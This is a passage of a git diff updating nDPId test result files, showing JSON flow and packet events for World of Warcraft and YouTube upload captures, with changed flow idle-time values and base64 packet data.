+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437858769437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769437,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJNAAIAGhLXAqLIUDIHeNZmNAFBo+hN9AAAAAKACIADawAAAAgQFtAEDAwIEAggKACnZUgAAAAA="} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858769451,"flow_last_seen":1437858769451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858769451,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437858769451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769451,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437858769452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769452,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437858769649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769649,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG6kgMgd41wKiyFABQmY301K7baPoTfqASFqCzawAAAgQFhAQCCAqn1+VGACnZUgEDAwc="} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769436,"flow_last_seen":1437858769651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1437858769651,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437858769673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1437858769673,"pkt":"JGURQGHhJGUR0Ik6CABFAAAwGJRAAHEGSPkYaR0VwKiyFABQmZCXtfydBIffHXASIACqLAAAAgQFhAQCAAA="} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769451,"flow_last_seen":1437858769820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1437858769820,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"launcher.worldofwarcraft.com","url":"launcher.worldofwarcraft.com\/alert","code":0,"content_type":"","user_agent":""}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858780584,"flow_last_seen":1437858780584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858780584,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437858780584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1437858780584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1437858780796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780796,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmaEZw7OGrM1zDqASOJCV8gAAAgQFhAQCCApCuV\/iACndrQEDAwc="} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858780584,"flow_last_seen":1437858781018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858781018,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858849489,"flow_last_seen":1437858849489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858849489,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437858849489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437858849489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437858849702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849702,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmcRkqiOyEV+yfKASOJAOpgAAAgQFhAQCCApCum0NACn4mAEDAwc="} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858849489,"flow_last_seen":1437858849924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858849924,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","packets-captured":83,"packets-processed":82,"total-skipped-flows":0,"total-l4-data-len":4309,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1437859397750} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437859397750,"flow_last_seen":1437859397750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437859397750,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437859397750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1437859397750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1437859397966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397966,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+UMgeSYwKiyFA6Mmqlj7+ucr3YvkqASOJA2KQAAAgQFhAQCCApCwowWACrOwgEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437859397750,"flow_last_seen":1437859398184,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437859398184,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1437858780584,"flow_last_seen":1437858782413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":2606,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1437858849489,"flow_last_seen":1437858850365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1437859397750,"flow_last_seen":1437859398661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769436,"flow_last_seen":1437858780442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769451,"flow_last_seen":1437858780577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":544,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437859397750,"flow_last_seen":1437859397750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437859397750,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437859397750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1437859397750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1437859397966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397966,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+UMgeSYwKiyFA6Mmqlj7+ucr3YvkqASOJA2KQAAAgQFhAQCCApCwowWACrOwgEDAwc="} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437859397750,"flow_last_seen":1437859398184,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437859398184,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1437858780584,"flow_last_seen":1437858782413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":2606,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1437858849489,"flow_last_seen":1437858850365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1437859397750,"flow_last_seen":1437859398661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769436,"flow_last_seen":1437858780442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769451,"flow_last_seen":1437858780577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":544,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 
00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","packets-captured":95,"packets-processed":95,"total-skipped-flows":0,"total-l4-data-len":4586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1437859398661} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 95/95 diff --git a/test/results/youtubeupload.pcap.out b/test/results/youtubeupload.pcap.out index 6ea8e6868..879994e09 100644 --- a/test/results/youtubeupload.pcap.out +++ b/test/results/youtubeupload.pcap.out 
@@ -3,21 +3,21 @@ 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1511102576794,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576794,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAT5AAIARbUHAqAIbrNkXb8rVAbsFThECDZHSvk7nMdgaUTAzOQFHnN3hyT1jd4lP+l6gAQUUQ0hMTxMAAABQQUQAywMAAFNOSQDdAwAAVkVSAOEDAABDQ1MA8QMAAE1TUEP1AwAAVUFJRCQEAABUQ0lEKAQAAFBETUQsBAAAU01ITDAEAABJQ1NMNAQAAENUSU08BAAATk9OUFwEAABNSURTYAQAAFNDTFNkBAAAQ1NDVGQEAABDT1BUaAQAAElSVFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0
